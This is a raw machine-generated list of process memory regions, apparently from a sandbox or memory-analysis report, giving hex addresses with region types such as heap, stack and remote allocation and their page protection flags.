CA1000
heap
page read and write
279AEF7E000
heap
page read and write
24A8090E000
trusted library allocation
page read and write
CA1000
heap
page read and write
613000
heap
page read and write
D8D36FD000
stack
page read and write
165000
unkown
page read and write
CA1000
heap
page read and write
524000
heap
page read and write
3299000
stack
page read and write
7400000
heap
page execute and read and write
CA1000
heap
page read and write
58E000
stack
page read and write
4B2B000
stack
page read and write
1C5CC000
system
page read and write
279AEFA2000
heap
page read and write
CA1000
heap
page read and write
4FFE000
stack
page read and write
7FFD9B920000
trusted library allocation
page execute and read and write
783F000
heap
page read and write
24AEAB8E000
heap
page read and write
1BF5C4D3000
heap
page read and write
279AEDD5000
heap
page read and write
21A0000
unkown
page readonly
279AEDA0000
heap
page read and write
24A80082000
trusted library allocation
page read and write
279AEDA5000
heap
page read and write
8F0000
unkown
page readonly
279AEF14000
heap
page read and write
956EFFE000
stack
page read and write
7E2D000
stack
page read and write
2E90000
direct allocation
page read and write
7FFD9BA50000
trusted library allocation
page read and write
7FFD9B75D000
trusted library allocation
page execute and read and write
2248E000
stack
page read and write
2110000
unkown
page readonly
279AEF2F000
heap
page read and write
78A4000
heap
page read and write
CA1000
heap
page read and write
6019000
trusted library allocation
page read and write
23774350000
heap
page read and write
CA1000
heap
page read and write
CA1000
heap
page read and write
CA1000
heap
page read and write
34CE000
stack
page read and write
CA1000
heap
page read and write
CA1000
heap
page read and write
6F86000
heap
page read and write
279AD021000
heap
page read and write
8F40000
direct allocation
page read and write
8E70000
trusted library allocation
page read and write
4FD000
stack
page read and write
24AEAAD0000
heap
page read and write
279AEF3E000
heap
page read and write
5145000
trusted library allocation
page read and write
CA1000
heap
page read and write
CA1000
heap
page read and write
24AEAD20000
trusted library allocation
page read and write
4E52000
trusted library allocation
page read and write
CA1000
heap
page read and write
279AF0AC000
heap
page read and write
7CC7000
trusted library allocation
page read and write
167000
unkown
page readonly
6FA2000
heap
page read and write
2FEE000
stack
page read and write
7F8000
heap
page read and write
24AECC57000
heap
page read and write
279AEDD5000
heap
page read and write
CA1000
heap
page read and write
CA1000
heap
page read and write
212F0550000
heap
page read and write
442E000
stack
page read and write
21EF0000
direct allocation
page read and write
783E000
heap
page read and write
7CDA000
trusted library allocation
page read and write
279ACF20000
heap
page read and write
CA1000
heap
page read and write
24AEC470000
heap
page execute and read and write
8E60000
trusted library allocation
page read and write
784D000
heap
page read and write
CA1000
heap
page read and write
251F1000
unclassified section
page execute and read and write
779E000
stack
page read and write
77E0000
heap
page read and write
CA1000
heap
page read and write
751000
unkown
page readonly
78D6000
heap
page read and write
7FFD9BA10000
trusted library allocation
page read and write
260C000
unkown
page read and write
F0000
unkown
page readonly
CA1000
heap
page read and write
7915000
heap
page read and write
4F60000
heap
page read and write
CA1000
heap
page read and write
7CC0000
trusted library allocation
page read and write
CA1000
heap
page read and write
CA0000
heap
page read and write
C033000
direct allocation
page execute and read and write
279AEEDE000
heap
page read and write
24AECC5E000
heap
page read and write
279AEDCF000
heap
page read and write
24AECC7C000
heap
page read and write
8F0000
unkown
page readonly
279AD0AC000
heap
page read and write
709000
system
page execute and read and write
24AEC9A1000
heap
page read and write
D8D30FE000
stack
page read and write
24A80518000
trusted library allocation
page read and write
7DBD000
stack
page read and write
4BEE000
stack
page read and write
5FF1000
trusted library allocation
page read and write
165000
unkown
page read and write
2FFE000
stack
page read and write
CA1000
heap
page read and write
89D0000
heap
page read and write
CA1000
heap
page read and write
279AEDA4000
heap
page read and write
279AEF9E000
heap
page read and write
7FFD9B7AC000
trusted library allocation
page execute and read and write
24A81DBB000
trusted library allocation
page read and write
2299E000
heap
page read and write
2238F000
stack
page read and write
608000
heap
page read and write
279AEF9E000
heap
page read and write
510000
heap
page read and write
7FFD9B810000
trusted library allocation
page execute and read and write
279AEFA3000
heap
page read and write
279AEF7E000
heap
page read and write
49D947C000
stack
page read and write
1BA000
stack
page read and write
279AEEB1000
heap
page read and write
279AEDAA000
heap
page read and write
4CA0000
heap
page read and write
279ACFF4000
heap
page read and write
151000
unkown
page execute read
24AEA9D0000
heap
page read and write
3CF1000
unkown
page execute and read and write
461D000
direct allocation
page execute and read and write
22779000
heap
page read and write
279AEEC1000
heap
page read and write
CA1000
heap
page read and write
CA1000
heap
page read and write
165000
unkown
page read and write
279AEF1A000
heap
page read and write
348E000
stack
page read and write
CA1000
heap
page read and write
279AD0AB000
heap
page read and write
338E000
unkown
page read and write
279AD00D000
heap
page read and write
CA1000
heap
page read and write
24A809B8000
trusted library allocation
page read and write
78B6000
heap
page read and write
7A0E000
stack
page read and write
279AEEFF000
heap
page read and write
6E6E000
stack
page read and write
279AF07C000
heap
page read and write
2E50000
heap
page read and write
800000
unkown
page readonly
7EF0000
trusted library allocation
page read and write
279AF0AC000
heap
page read and write
279AEFA3000
heap
page read and write
4920000
heap
page read and write
2D50000
heap
page read and write
CA1000
heap
page read and write
2ED0000
direct allocation
page read and write
CA1000
heap
page read and write
279AEDCC000
heap
page read and write
23D83000
unclassified section
page execute and read and write
212F06D0000
heap
page read and write
78F6000
heap
page read and write
279AEF9E000
heap
page read and write
279AEEDE000
heap
page read and write
7940000
trusted library allocation
page read and write
751000
unkown
page readonly
35C8000
heap
page read and write
2000000
heap
page read and write
279AF077000
heap
page read and write
279AEDEB000
heap
page read and write
CA1000
heap
page read and write
1BF5DF0E000
trusted library allocation
page read and write
1BF5C4D3000
heap
page read and write
840000
trusted library allocation
page read and write
279AEE1F000
heap
page read and write
279AEE53000
heap
page read and write
44EC000
stack
page read and write
B90000
unkown
page readonly
CA1000
heap
page read and write
CA1000
heap
page read and write
6D8727F000
stack
page read and write
279AEEE3000
heap
page read and write
24A81E2C000
trusted library allocation
page read and write
CA1000
heap
page read and write
CA1000
heap
page read and write
2234E000
stack
page read and write
24AEC950000
heap
page read and write
130000
unkown
page read and write
7A70000
heap
page execute and read and write
279AEEF1000
heap
page read and write
279AEDB4000
heap
page read and write
CB0000
heap
page read and write
7F10000
trusted library allocation
page read and write
279AEEE4000
heap
page read and write
697000
heap
page read and write
4FE0000
heap
page execute and read and write
1BF5DDC0000
trusted library allocation
page read and write
624000
heap
page read and write
24AEAB18000
heap
page read and write
CA1000
heap
page read and write
D8D34FE000
stack
page read and write
279AEDB3000
heap
page read and write
8F30000
direct allocation
page read and write
7FFD9BAD0000
trusted library allocation
page read and write
89F0000
trusted library allocation
page read and write
279AEDF3000
heap
page read and write
279AEF7A000
heap
page read and write
279AF060000
heap
page read and write
279AEF9E000
heap
page read and write
279AEF7B000
heap
page read and write
4E20000
trusted library allocation
page read and write
CA1000
heap
page read and write
CA1000
heap
page read and write
212F06C0000
heap
page read and write
21F20000
direct allocation
page read and write
279AEE66000
heap
page read and write
CA1000
heap
page read and write
40000
unkown
page readonly
1BF5E0CE000
trusted library allocation
page read and write
CA1000
heap
page read and write
4F50000
trusted library allocation
page read and write
47BD000
direct allocation
page execute and read and write
CA1000
heap
page read and write
279AEDD1000
heap
page read and write
279AEF84000
heap
page read and write
CA1000
heap
page read and write
23F2000
unkown
page read and write
24A8204F000
trusted library allocation
page read and write
7FFD9B990000
trusted library allocation
page read and write
7FFD9B76B000
trusted library allocation
page read and write
4473000
heap
page read and write
279AEF9E000
heap
page read and write
3200000
remote allocation
page execute and read and write
1FDE000
stack
page read and write
CA1000
heap
page read and write
8C63000
heap
page read and write
2D70000
heap
page read and write
CA1000
heap
page read and write
8FE0000
direct allocation
page read and write
7E50000
trusted library allocation
page read and write
CA1000
heap
page read and write
7FFD9B806000
trusted library allocation
page read and write
608000
heap
page read and write
E90000
trusted library allocation
page read and write
7C0000
unkown
page readonly
100000
heap
page read and write
2332000
unkown
page read and write
2ED0000
direct allocation
page read and write
279AEDC4000
heap
page read and write
7849000
heap
page read and write
6D2000
heap
page read and write
279AEFA2000
heap
page read and write
CA1000
heap
page read and write
279AEF7F000
heap
page read and write
CA1000
heap
page read and write
900000
heap
page read and write
CA1000
heap
page read and write
24A8040B000
trusted library allocation
page read and write
CA1000
heap
page read and write
279ACFC5000
heap
page read and write
CA1000
heap
page read and write
8E40000
trusted library allocation
page read and write
6A6000
system
page execute and read and write
2EAA000
unkown
page read and write
279AEF25000
heap
page read and write
7DFE000
stack
page read and write
2E08000
heap
page read and write
956FFFE000
stack
page read and write
279AEDD2000
heap
page read and write
279AF1BF000
heap
page read and write
F0D000
stack
page read and write
4AAB000
stack
page read and write
CA1000
heap
page read and write
77DF000
stack
page read and write
608000
heap
page read and write
7EA0000
trusted library allocation
page read and write
279AEDB8000
heap
page read and write
279AD0BC000
heap
page read and write
CA1000
heap
page read and write
229B0000
direct allocation
page execute and read and write
4E23000
trusted library allocation
page execute and read and write
279AD0A1000
heap
page read and write
2F70000
heap
page read and write
212F058B000
heap
page read and write
7FFD9B760000
trusted library allocation
page read and write
4DF0000
trusted library section
page read and write
788A000
heap
page read and write
7F5F000
stack
page read and write
5B53000
remote allocation
page execute and read and write
CA1000
heap
page read and write
15E000
unkown
page readonly
468E000
direct allocation
page execute and read and write
2EED000
stack
page read and write
279AEEFC000
heap
page read and write
600000
heap
page read and write
78BC000
heap
page read and write
78A9000
heap
page read and write
CA1000
heap
page read and write
23774270000
heap
page read and write
495C000
unclassified section
page read and write
4F4E000
stack
page read and write
212F0580000
heap
page read and write
CA1000
heap
page read and write
524000
heap
page read and write
4C00000
heap
page read and write
279AEF1D000
heap
page read and write
279AEE33000
heap
page read and write
4970000
heap
page read and write
1BF5C470000
heap
page read and write
CA1000
heap
page read and write
1F0000
unkown
page readonly
4ECE000
stack
page read and write
CA1000
heap
page read and write
279AEDED000
heap
page read and write
279AEDB8000
heap
page read and write
78BB000
heap
page read and write
1BF5C3BE000
system
page execute and read and write
CA1000
heap
page read and write
CA1000
heap
page read and write
CA1000
heap
page read and write
7FFD9B800000
trusted library allocation
page read and write
279AEE30000
heap
page read and write
24AECC83000
heap
page read and write
7FFD9B960000
trusted library allocation
page read and write
279AEE48000
heap
page read and write
279AF06E000
heap
page read and write
24AEC360000
trusted library allocation
page read and write
7AFB000
heap
page read and write
279AEE22000
heap
page read and write
279AEF3C000
heap
page read and write
8C3C000
stack
page read and write
CA1000
heap
page read and write
7B15000
heap
page read and write
6D878FB000
stack
page read and write
E90000
trusted library allocation
page read and write
6D86F0E000
stack
page read and write
CA1000
heap
page read and write
CA1000
heap
page read and write
24AECAC0000
heap
page read and write
24AECAE3000
heap
page read and write
279AEF3E000
heap
page read and write
798E000
stack
page read and write
24A81E8E000
trusted library allocation
page read and write
7DF4E3090000
trusted library allocation
page execute and read and write
279AEFA3000
heap
page read and write
7FFD9B754000
trusted library allocation
page read and write
3330000
heap
page read and write
279AEF23000
heap
page read and write
20000
unkown
page readonly
7E7E000
stack
page read and write
24A809A4000
trusted library allocation
page read and write
8FC0000
direct allocation
page read and write
53BA000
unclassified section
page read and write
279AEE0B000
heap
page read and write
279AEF04000
heap
page read and write
279AEE52000
heap
page read and write
165000
unkown
page read and write
167000
unkown
page readonly
24AECBC0000
heap
page read and write
279AD022000
heap
page read and write
613000
heap
page read and write
279AEE0E000
heap
page read and write
279AF0D5000
heap
page read and write
1BF5DF13000
trusted library allocation
page read and write
7AA0000
heap
page read and write
613000
heap
page read and write
51CC000
stack
page read and write
4E39000
trusted library allocation
page read and write
279AEDA1000
heap
page read and write
1C0000
unkown
page read and write
15E000
unkown
page readonly
88F0000
heap
page read and write
CA1000
heap
page read and write
CA1000
heap
page read and write
29F4000
unkown
page read and write
4FAE000
stack
page read and write
CA1000
heap
page read and write
279AD0D3000
heap
page read and write
279AEFA2000
heap
page read and write
CA1000
heap
page read and write
8C5B000
heap
page read and write
7AD0000
heap
page read and write
605E000
trusted library allocation
page read and write
24AECCB5000
heap
page read and write
279AEFAE000
heap
page read and write
CA1000
heap
page read and write
CA1000
heap
page read and write
2320000
heap
page read and write
7CD0000
trusted library allocation
page read and write
740000
unkown
page read and write
50F1000
unkown
page execute and read and write
1BF5DE00000
trusted library allocation
page read and write
279AEDCF000
heap
page read and write
8C5F000
heap
page read and write
279AEF84000
heap
page read and write
279AF0C9000
heap
page read and write
279AEF2C000
heap
page read and write
279AEF08000
heap
page read and write
CA1000
heap
page read and write
279AEDC0000
heap
page read and write
1BE000
stack
page read and write
7FFD9B750000
trusted library allocation
page read and write
CA1000
heap
page read and write
279AEDBD000
heap
page read and write
CA1000
heap
page read and write
7405000
heap
page execute and read and write
279AEFAA000
heap
page read and write
279AEFA2000
heap
page read and write
8FF0000
direct allocation
page read and write
22AD9000
direct allocation
page execute and read and write
279AEF0F000
heap
page read and write
2E52000
heap
page read and write
7FFD9BA40000
trusted library allocation
page read and write
279AEDB5000
heap
page read and write
212F06C5000
heap
page read and write
6F10000
direct allocation
page read and write
23DF1000
unclassified section
page execute and read and write
8A35000
trusted library allocation
page read and write
223CD000
stack
page read and write
CA1000
heap
page read and write
24A80547000
trusted library allocation
page read and write
1BF5DF03000
trusted library allocation
page read and write
CA1000
heap
page read and write
279AEDBA000
heap
page read and write
2264C000
stack
page read and write
46F1000
unkown
page execute and read and write
279AEE4D000
heap
page read and write
279AEF7F000
heap
page read and write
D8D33FE000
stack
page read and write
351C000
heap
page read and write
151000
unkown
page execute read
CA1000
heap
page read and write
CA1000
heap
page read and write
24AECAE0000
heap
page read and write
24AECBDA000
heap
page read and write
24AEC600000
heap
page read and write
2E47000
heap
page read and write
279AEF7B000
heap
page read and write
6EE0000
direct allocation
page read and write
CA1000
heap
page read and write
279AEE5A000
heap
page read and write
151000
unkown
page execute read
22651000
heap
page read and write
3353000
remote allocation
page execute and read and write
2190000
heap
page read and write
2C89000
heap
page read and write
279AEE58000
heap
page read and write
279AD07F000
heap
page read and write
7E80000
trusted library allocation
page read and write
1BF5C4BC000
heap
page read and write
CA1000
heap
page read and write
956F7FE000
stack
page read and write
279AEFAB000
heap
page read and write
279AEF9E000
heap
page read and write
279AEDDA000
heap
page read and write
3407000
heap
page read and write
279AF07B000
heap
page read and write
CA1000
heap
page read and write
514E000
stack
page read and write
CA33000
direct allocation
page execute and read and write
78DD000
heap
page read and write
CA1000
heap
page read and write
293B000
stack
page read and write
49D94FE000
stack
page read and write
279AEDBB000
heap
page read and write
78EC000
heap
page read and write
247F1000
unclassified section
page execute and read and write
78E2000
heap
page read and write
279AF063000
heap
page read and write
24AEAB1F000
heap
page read and write
CA1000
heap
page read and write
78AF000
heap
page read and write
279AEDFE000
heap
page read and write
150000
unkown
page readonly
279AEF84000
heap
page read and write
279AEFAE000
heap
page read and write
279AEF84000
heap
page read and write
78B6000
heap
page read and write
800000
unkown
page readonly
CA1000
heap
page read and write
73EE000
stack
page read and write
279AEE17000
heap
page read and write
24AECCA5000
heap
page read and write
279AEF84000
heap
page read and write
279AEED6000
heap
page read and write
8EA0000
trusted library allocation
page execute and read and write
CA1000
heap
page read and write
24AEAA50000
trusted library allocation
page read and write
7885000
heap
page read and write
CA1000
heap
page read and write
279AD09F000
heap
page read and write
24A902FF000
trusted library allocation
page read and write
73AE000
stack
page read and write
279AF0AC000
heap
page read and write
CA1000
heap
page read and write
24A809B0000
trusted library allocation
page read and write
7880000
heap
page read and write
24AEAAD5000
heap
page read and write
B633000
direct allocation
page execute and read and write
3D53000
remote allocation
page execute and read and write
23774170000
heap
page read and write
24AEC3D0000
heap
page execute and read and write
7B80000
heap
page read and write
CA1000
heap
page read and write
6F98000
heap
page read and write
7ED0000
trusted library allocation
page read and write
6D86FCF000
stack
page read and write
4E4A000
trusted library allocation
page execute and read and write
279AEFA3000
heap
page read and write
279AD0A4000
heap
page read and write
7FFD9B980000
trusted library allocation
page read and write
24AEAADF000
heap
page read and write
4E40000
trusted library allocation
page read and write
2C3E000
stack
page read and write
88E7000
stack
page read and write
2230F000
stack
page read and write
279AEFA6000
heap
page read and write
49D957F000
stack
page read and write
524000
heap
page read and write
744E000
stack
page read and write
120000
heap
page read and write
6D86E83000
stack
page read and write
279AF084000
heap
page read and write
6D883CB000
stack
page read and write
7FFD9BA90000
trusted library allocation
page read and write
4F0F000
stack
page read and write
44E4000
heap
page read and write
355A000
heap
page read and write
4FAC000
stack
page read and write
279AEF7E000
heap
page read and write
24AEAA70000
trusted library allocation
page read and write
7B61000
heap
page read and write
4E55000
trusted library allocation
page execute and read and write
279AEDCF000
heap
page read and write
CA1000
heap
page read and write
2D0E000
stack
page read and write
1BF5C4D0000
heap
page read and write
7871000
heap
page read and write
524000
heap
page read and write
120000
heap
page read and write
24AEC4A0000
heap
page read and write
CA1000
heap
page read and write
279AEEED000
heap
page read and write
2C48000
heap
page read and write
CA1000
heap
page read and write
9000000
direct allocation
page read and write
279AEF7E000
heap
page read and write
3510000
heap
page read and write
24AEAA80000
heap
page readonly
279AEEEC000
heap
page read and write
7FFD9B90A000
trusted library allocation
page read and write
7D6E000
stack
page read and write
279AEDC0000
heap
page read and write
279AF077000
heap
page read and write
7FFD9B910000
trusted library allocation
page execute and read and write
D8D38FF000
stack
page read and write
279AF185000
heap
page read and write
279AD0B1000
heap
page read and write
696000
system
page execute and read and write
279AEDA8000
heap
page read and write
74CE000
stack
page read and write
4902000
unclassified section
page read and write
279AEF23000
heap
page read and write
D8D35FB000
stack
page read and write
CA1000
heap
page read and write
6D882CE000
stack
page read and write
6D874FE000
stack
page read and write
4ED0000
trusted library allocation
page execute and read and write
279AEEC2000
heap
page read and write
CA1000
heap
page read and write
279AEEC3000
heap
page read and write
22656000
heap
page read and write
2260B000
stack
page read and write
8C40000
heap
page read and write
24A81E41000
trusted library allocation
page read and write
7FFD9B932000
trusted library allocation
page read and write
8FB0000
direct allocation
page read and write
7FFD9BA30000
trusted library allocation
page read and write
CA1000
heap
page read and write
CA1000
heap
page read and write
279AEF3E000
heap
page read and write
748E000
stack
page read and write
6D86F8E000
stack
page read and write
279AD0D0000
heap
page read and write
1C2F2000
system
page read and write
141000
unkown
page readonly
279AEDBF000
heap
page read and write
CA1000
heap
page read and write
CA1000
heap
page read and write
279AEF7E000
heap
page read and write
CA1000
heap
page read and write
4346000
heap
page read and write
30000
unkown
page readonly
279AF0E6000
heap
page read and write
1BF5E0BE000
trusted library allocation
page read and write
279AF135000
heap
page read and write
7FFD9B9F0000
trusted library allocation
page read and write
498000
stack
page read and write
7863000
heap
page read and write
CA1000
heap
page read and write
7E70000
trusted library allocation
page read and write
325C000
stack
page read and write
1E0000
unkown
page readonly
100000
heap
page read and write
6FA8000
heap
page read and write
CA1000
heap
page read and write
CA1000
heap
page read and write
5D0000
unkown
page read and write
21A0000
unkown
page readonly
6D872FD000
stack
page read and write
6B2000
system
page execute and read and write
22C81000
direct allocation
page execute and read and write
279AD09F000
heap
page read and write
7868000
heap
page read and write
CA1000
heap
page read and write
4E70000
trusted library allocation
page read and write
4753000
remote allocation
page execute and read and write
7FFD9B970000
trusted library allocation
page read and write
6F20000
heap
page read and write
7908000
heap
page read and write
4619000
direct allocation
page execute and read and write
1F0000
unkown
page readonly
7A80000
trusted library allocation
page read and write
CA1000
heap
page read and write
6FA7000
heap
page read and write
786B000
heap
page read and write
350F000
stack
page read and write
30000
unkown
page readonly
1BF5DDB0000
heap
page read and write
789C000
heap
page read and write
1C0000
unkown
page read and write
CB7000
heap
page read and write
1BF5DF21000
trusted library allocation
page read and write
260C000
unkown
page read and write
8910000
trusted library allocation
page read and write
7FFD9B940000
trusted library allocation
page execute and read and write
4EBE000
stack
page read and write
237745C5000
heap
page read and write
2292D000
heap
page read and write
4E2D000
trusted library allocation
page execute and read and write
8AAC000
stack
page read and write
8C4C000
heap
page read and write
279AD0BB000
heap
page read and write
CA1000
heap
page read and write
279AEED6000
heap
page read and write
CA1000
heap
page read and write
24A90010000
trusted library allocation
page read and write
F0000
unkown
page readonly
7A87000
trusted library allocation
page read and write
7B65000
heap
page read and write
7EC0000
trusted library allocation
page read and write
279AEF02000
heap
page read and write
7FFD9B80C000
trusted library allocation
page execute and read and write
76DA000
stack
page read and write
279AF10A000
heap
page read and write
212F0470000
heap
page read and write
24AECBD4000
heap
page read and write
524000
heap
page read and write
5F6000
heap
page read and write
279AEE06000
heap
page read and write
24A81E4B000
trusted library allocation
page read and write
6F8F000
heap
page read and write
CA1000
heap
page read and write
CA1000
heap
page read and write
279AF134000
heap
page read and write
279AEED6000
heap
page read and write
8AC0000
trusted library allocation
page execute and read and write
21EE0000
direct allocation
page read and write
7FFD9BA60000
trusted library allocation
page read and write
279AEFA2000
heap
page read and write
20000
unkown
page readonly
CA1000
heap
page read and write
1E0000
unkown
page readonly
CA1000
heap
page read and write
8AD0000
heap
page read and write
AA000
stack
page read and write
CA1000
heap
page read and write
2FBE000
stack
page read and write
279AEDDD000
heap
page read and write
279AEF31000
heap
page read and write
6F8F000
heap
page read and write
47DE000
stack
page read and write
CA1000
heap
page read and write
34CE000
stack
page read and write
CA1000
heap
page read and write
CA1000
heap
page read and write
167000
unkown
page readonly
24AECA17000
heap
page read and write
4FD000
stack
page read and write
7B47000
heap
page read and write
1BF5C4CC000
heap
page read and write
446F000
stack
page read and write
7FFD9B9E0000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
279AEDAB000
heap
page read and write
24AEC390000
trusted library allocation
page read and write
75DB000
stack
page read and write
110000
unkown
page readonly
279AEDCD000
heap
page read and write
2253E000
stack
page read and write
4FBF000
stack
page read and write
5153000
remote allocation
page execute and read and write
1BF5E0AB000
trusted library allocation
page read and write
7FFD9BA80000
trusted library allocation
page read and write
48BE000
stack
page read and write
CA1000
heap
page read and write
7BFEDDD000
stack
page read and write
24AEAA90000
heap
page read and write
279AD0A1000
heap
page read and write
6F38000
heap
page read and write
8F90000
direct allocation
page read and write
7BFF0FE000
unkown
page read and write
7BFF1FF000
stack
page read and write
370E000
stack
page read and write
15E000
unkown
page readonly
7EB0000
trusted library allocation
page read and write
279AEE3B000
heap
page read and write
4DCE000
stack
page read and write
E90000
trusted library allocation
page read and write
279AF07C000
heap
page read and write
7FFD9B753000
trusted library allocation
page execute and read and write
2324000
heap
page read and write
5F0000
heap
page read and write
279AF280000
remote allocation
page read and write
4E8E000
stack
page read and write
CA1000
heap
page read and write
24A90001000
trusted library allocation
page read and write
279AEF0B000
heap
page read and write
68C000
system
page execute and read and write
E0000
unkown
page readonly
8E50000
trusted library allocation
page read and write
279AEEC0000
heap
page read and write
279AEDA8000
heap
page read and write
24A82048000
trusted library allocation
page read and write
279AEF84000
heap
page read and write
40000
unkown
page readonly
6F72000
heap
page read and write
1C9B4000
system
page read and write
357F000
heap
page read and write
760000
unkown
page read and write
5048000
trusted library allocation
page read and write
150000
unkown
page readonly
6FA1000
heap
page read and write
2D4E000
stack
page read and write
CA1000
heap
page read and write
771E000
stack
page read and write
24A9030F000
trusted library allocation
page read and write
279AEF76000
heap
page read and write
6FBB000
heap
page read and write
CA1000
heap
page read and write
24A81AB2000
trusted library allocation
page read and write
279AD0B1000
heap
page read and write
110000
unkown
page readonly
4F38000
trusted library allocation
page read and write
5F0000
heap
page read and write
279AEF23000
heap
page read and write
279AEF86000
heap
page read and write
279AEF9E000
heap
page read and write
224E0000
heap
page read and write
1BF5E001000
trusted library allocation
page read and write
33E0000
heap
page read and write
CA1000
heap
page read and write
CA1000
heap
page read and write
CA1000
heap
page read and write
4F04000
unclassified section
page read and write
24AECA23000
heap
page read and write
279AD00E000
heap
page read and write
CA1000
heap
page read and write
1E0000
unkown
page readonly
50FF000
stack
page read and write
24AEA9B0000
heap
page read and write
279AEF6D000
heap
page read and write
279AEDA2000
heap
page read and write
CA1000
heap
page read and write
4F8F000
stack
page read and write
6EF0000
direct allocation
page read and write
22800000
heap
page read and write
279AD05D000
heap
page read and write
CA1000
heap
page read and write
2D7E000
stack
page read and write
279AF280000
remote allocation
page read and write
279AEDA4000
heap
page read and write
7FFD9B770000
trusted library allocation
page read and write
279AF077000
heap
page read and write
279AEEB7000
heap
page read and write
22929000
heap
page read and write
CA1000
heap
page read and write
4F67000
heap
page read and write
22D00000
unclassified section
page execute and read and write
279AD069000
heap
page read and write
24AEAAD9000
heap
page read and write
481F000
stack
page read and write
A233000
direct allocation
page execute and read and write
B91000
unkown
page readonly
7E40000
trusted library allocation
page execute and read and write
CA1000
heap
page read and write
520C000
stack
page read and write
CA1000
heap
page read and write
E0000
unkown
page readonly
279AF0C4000
heap
page read and write
CA1000
heap
page read and write
7CB0000
trusted library allocation
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
279AEFAE000
heap
page read and write
CA1000
heap
page read and write
244C000
unkown
page read and write
AA000
stack
page read and write
8900000
trusted library allocation
page execute and read and write
7842000
heap
page read and write
CA1000
heap
page read and write
1E0000
unkown
page readonly
8C57000
heap
page read and write
1BF5E0C4000
trusted library allocation
page read and write
279AEE38000
heap
page read and write
6F8F000
heap
page read and write
4E24000
trusted library allocation
page read and write
279AF062000
heap
page read and write
279AF0AC000
heap
page read and write
8C95000
heap
page read and write
CA1000
heap
page read and write
24A81AA4000
trusted library allocation
page read and write
279AF0AC000
heap
page read and write
24AECA4C000
heap
page read and write
23774250000
heap
page read and write
D8D31FE000
stack
page read and write
2257F000
stack
page read and write
279AEF84000
heap
page read and write
1FE4000
heap
page read and write
1BF5DF00000
trusted library allocation
page read and write
150000
unkown
page readonly
6D873FE000
stack
page read and write
24AEC4A4000
heap
page read and write
24A809CF000
trusted library allocation
page read and write
279AF1C1000
heap
page read and write
2ED0000
direct allocation
page read and write
4EC0000
heap
page readonly
7EBF000
stack
page read and write
47C1000
direct allocation
page execute and read and write
224CF000
stack
page read and write
1BF5DD50000
heap
page read and write
38C0000
heap
page read and write
6E17000
heap
page read and write
956DFFC000
stack
page read and write
279AEE28000
heap
page read and write
CA1000
heap
page read and write
7FFD9BA00000
trusted library allocation
page read and write
7DAE000
stack
page read and write
CA1000
heap
page read and write
24A813F4000
trusted library allocation
page read and write
CA1000
heap
page read and write
279AEEDE000
heap
page read and write
CA1000
heap
page read and write
619000
heap
page read and write
279AF0AC000
heap
page read and write
5D0000
heap
page read and write
CA1000
heap
page read and write
CA1000
heap
page read and write
7844000
heap
page read and write
279AEDE2000
heap
page read and write
7FFD9B836000
trusted library allocation
page execute and read and write
4950000
heap
page read and write
22C7D000
direct allocation
page execute and read and write
1BF5E000000
trusted library allocation
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
279AF064000
heap
page read and write
CA1000
heap
page read and write
279ACF40000
heap
page read and write
4920000
heap
page read and write
CA1000
heap
page read and write
279AEE1A000
heap
page read and write
279AEF67000
heap
page read and write
8BFE000
stack
page read and write
279AEEB0000
heap
page read and write
279AF280000
remote allocation
page read and write
6F88000
heap
page read and write
1FE0000
heap
page read and write
8C0000
heap
page read and write
CA1000
heap
page read and write
3340000
heap
page read and write
24A81E92000
trusted library allocation
page read and write
279AF132000
heap
page read and write
4B1C000
unclassified section
page read and write
CA1000
heap
page read and write
279AEF3E000
heap
page read and write
4E4E000
stack
page read and write
1BF5C360000
system
page execute and read and write
6D877FE000
stack
page read and write
24A82063000
trusted library allocation
page read and write
2290000
unkown
page read and write
78E6000
heap
page read and write
279AF061000
heap
page read and write
D8D2DB9000
stack
page read and write
7F5B000
stack
page read and write
3283000
unkown
page execute and read and write
279AEDCA000
heap
page read and write
500000
unkown
page readonly
279AEF02000
heap
page read and write
22CF2000
direct allocation
page execute and read and write
24A80001000
trusted library allocation
page read and write
2343000
unkown
page read and write
279AD0A4000
heap
page read and write
2C3B000
stack
page read and write
22650000
heap
page read and write
279AF064000
heap
page read and write
CA1000
heap
page read and write
7FFD9B901000
trusted library allocation
page read and write
8BBB000
stack
page read and write
6F88000
heap
page read and write
2C79000
stack
page read and write
898D000
stack
page read and write
32F1000
unkown
page execute and read and write
7E3C000
stack
page read and write
1FE0000
heap
page read and write
7A4F000
stack
page read and write
6EC0000
direct allocation
page read and write
7FFD9BAB0000
trusted library allocation
page read and write
2E76000
heap
page read and write
2CC0000
heap
page read and write
279AF0BD000
heap
page read and write
279AF1B5000
heap
page read and write
279AF0D3000
heap
page read and write
CA1000
heap
page read and write
150000
unkown
page readonly
510000
heap
page read and write
167000
unkown
page readonly
24AEC4BE000
heap
page read and write
CA1000
heap
page read and write
8F70000
direct allocation
page read and write
CA1000
heap
page read and write
619000
heap
page read and write
CA1000
heap
page read and write
702E000
stack
page read and write
CA1000
heap
page read and write
4E50000
trusted library allocation
page read and write
279AF084000
heap
page read and write
279AEFA3000
heap
page read and write
62A1000
trusted library allocation
page read and write
CA1000
heap
page read and write
279AEF29000
heap
page read and write
8F50000
direct allocation
page read and write
5F8000
heap
page read and write
CA1000
heap
page read and write
CA1000
heap
page read and write
CA1000
heap
page read and write
CA1000
heap
page read and write
279ACFB0000
heap
page read and write
3300000
heap
page read and write
130000
unkown
page read and write
8FD0000
direct allocation
page read and write
22A0000
unkown
page read and write
279AEF3E000
heap
page read and write
358C000
heap
page read and write
CA1000
heap
page read and write
8FA0000
direct allocation
page read and write
89E0000
trusted library allocation
page execute and read and write
2000000
heap
page read and write
8EEE000
stack
page read and write
CA1000
heap
page read and write
8F2C000
stack
page read and write
24AEAA9B000
heap
page read and write
4340000
trusted library allocation
page execute and read and write
15E000
unkown
page readonly
237742F0000
heap
page read and write
100000
unkown
page readonly
279AEDC5000
heap
page read and write
7BC2000
heap
page read and write
CA1000
heap
page read and write
613000
heap
page read and write
7FAD0000
trusted library allocation
page execute and read and write
500000
unkown
page readonly
7DEE000
stack
page read and write
CA1000
heap
page read and write
6C8000
heap
page read and write
3528000
heap
page read and write
279AEEDE000
heap
page read and write
4FEF000
stack
page read and write
CA1000
heap
page read and write
279AEDF6000
heap
page read and write
3550000
heap
page read and write
279AF073000
heap
page read and write
7FFD9B870000
trusted library allocation
page execute and read and write
750F000
stack
page read and write
CA1000
heap
page read and write
24AECE20000
heap
page read and write
2240B000
